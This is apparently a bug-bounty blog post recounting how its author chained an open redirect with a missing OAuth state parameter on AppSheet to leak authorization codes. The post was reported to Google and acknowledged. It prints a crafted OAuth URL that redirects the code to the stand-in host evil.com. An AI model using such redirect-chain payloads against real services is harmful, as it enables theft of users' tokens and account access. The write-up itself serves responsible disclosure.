Got Nice catch by Google
This is my story of finding multiple bugs in Google’s acquisition chain to increase the severity and get a Nice catch by GOOGLE
So in 2020 lock-down started and many people started becoming more creative and I have seen lots of people finding more bugs during lock-down therefore I also think of giving another shot on Google as I already submitted many bugs but got duplicate or NA.
I chose a target as Appsheet.com which is google’s intelligent no coding platform it sounds good to me. Because I believe there is an AI there is a bug.
So I started looking bug and I found a link like
After login, I see this link is redirecting to the user to /account page so I tried simply as
but obviously, it won’t work as there are restrictions so I tried many payloads for redirection from below
and surprisingly /\/\/google.com worked.
but then I remember mostly Google won’t accept this kind of low-level bugs as I already submitted many silly bugs and google mark them won’t fix.
so for 2–3 days, I leave this target then after and one day I was discussing OAuth CSRF bugs with one of my friend @Pig.wig45 AKA Sahil Tikoo.
Then after immediately went back to appsheet.com and check OAuth related bugs and the good news there is not state parameter define as I’m getting state=?.
Basically, State parameter is used in Oauth to prevent CSRF attacks.
So till now I’m figure out that 2 things.
- Open Redirection
- Oauth CSRF
Now it’s time to check redirection URL (ru)in Oauth. this is the main part of Oauth 2.0 protocol if an attacker can change this URL it can leverage the user’s authentication token.
But most of the time this redirection URL is protected and in my case also. Therefore, I change the redirection URL with my Open-redirection URL so the final URL looks like this.
https://www.appsheet.com/Account/ELCGD?state=?FullScope=yesru=https%3a%2f%2fwww.appsheet.com%2fAccount?retrunUrl=/\/\/evil.com&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&scope=email profile https://www.googleapis.com/auth/userinfo.profile openid https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/spreadsheets https://www.googleapis.com/auth/drive&authuser=1&prompt=consent
Then Reported to Google and got nice catch by GOOGLE
Unfortunately, This bug get no bounty as google said acquired assets need atlist 6 month old and I reported on 5th month after google acquired (My bad luck)
However, I got mentioned in Google’s Honorable Hall of Fame.
Bug Bounty Tips:
- Always try to make higher impact and chain multiple bug
- Always read carefully about scope Always always always..(Otherwise no bounty)
- Never Give up
Remember : “NO GUTS, NO Glory !!!!”